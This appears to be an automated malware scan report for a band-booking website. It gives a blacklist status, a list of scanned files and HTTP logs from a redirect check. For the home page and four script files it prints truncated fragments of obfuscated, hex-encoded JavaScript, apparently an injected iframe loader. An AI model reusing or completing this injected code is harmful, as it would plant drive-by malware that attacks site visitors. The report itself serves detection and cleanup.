Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bandneedsgig.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bandneedsgig.com/ | 200 OK Content-Length: 16119 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) fbhhlo="spl"+"i"+"t";tmf=window;kxro="0"+"x";slcbp=(5-3-1);try{--(document["body"])}catch(zaj){vluo=false;try{}catch(zifawb){vluo=21;}if(1){uvx="17:5d:6c:65:5a:6b:60:66:65:17:5b:5a:67:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5b:5a:67:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:5b Antivirus reports:
| ||
http://www.bandneedsgig.com/js/validation.js | 200 OK Content-Length: 7249 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) bua="spl"+"i"+"t";vkppn=window;pqsbg="0"+"x";ixlij=(5-3-1);try{--(document["body"])}catch(tdgfjg){tgod=false;try{}catch(xokuz){tgod=21;}if(1){uexke="17:5d:6c:65:5a:6b:60:66:65:17:5c:61:6f:66:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5c:61:6f:66:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1 Antivirus reports:
| ||
http://www.bandneedsgig.com/js/gigvalidation.js | 200 OK Content-Length: 5261 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) bua="spl"+"i"+"t";vkppn=window;pqsbg="0"+"x";ixlij=(5-3-1);try{--(document["body"])}catch(tdgfjg){tgod=false;try{}catch(xokuz){tgod=21;}if(1){uexke="17:5d:6c:65:5a:6b:60:66:65:17:5c:61:6f:66:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5c:61:6f:66:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1 Antivirus reports:
| ||
http://www.bandneedsgig.com/js/prototype.js | 200 OK Content-Length: 51966 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) bua="spl"+"i"+"t";vkppn=window;pqsbg="0"+"x";ixlij=(5-3-1);try{--(document["body"])}catch(tdgfjg){tgod=false;try{}catch(xokuz){tgod=21;}if(1){uexke="17:5d:6c:65:5a:6b:60:66:65:17:5c:61:6f:66:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5c:61:6f:66:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1 Antivirus reports:
| ||
http://www.bandneedsgig.com/js/mf_lightbox.js | 200 OK Content-Length: 11782 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) bua="spl"+"i"+"t";vkppn=window;pqsbg="0"+"x";ixlij=(5-3-1);try{--(document["body"])}catch(tdgfjg){tgod=false;try{}catch(xokuz){tgod=21;}if(1){uexke="17:5d:6c:65:5a:6b:60:66:65:17:5c:61:6f:66:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5c:61:6f:66:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1 Antivirus reports:
| ||
http://ads.adbrite.com/mb/text_group.php?sid=499058&zs=3132305f363030 | 500 Can't connect to ads.adbrite.com:80 Content-Length: 190 Content-Type: text/plain | clean |
http://ads.adbrite.com/test404page.js | 500 Can't connect to ads.adbrite.com:80 Content-Length: 190 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bandneedsgig.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 05 Mar 2015 15:44:10 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Ngpass_ngall: 1
Set-Cookie: PHPSESSID=8acfc6d7d2dc0d893faff747df6bca14; path=/
GET / HTTP/1.1
Host: bandneedsgig.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 05 Mar 2015 15:44:10 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Ngpass_ngall: 1
Set-Cookie: PHPSESSID=8acfc6d7d2dc0d893faff747df6bca14; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: bandneedsgig.com
Referer: http://www.google.com/search?q=bandneedsgig.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bandneedsgig.com
Referer: http://www.google.com/search?q=bandneedsgig.com
Result:
The result is similar to the first query. There are no suspicious redirects found.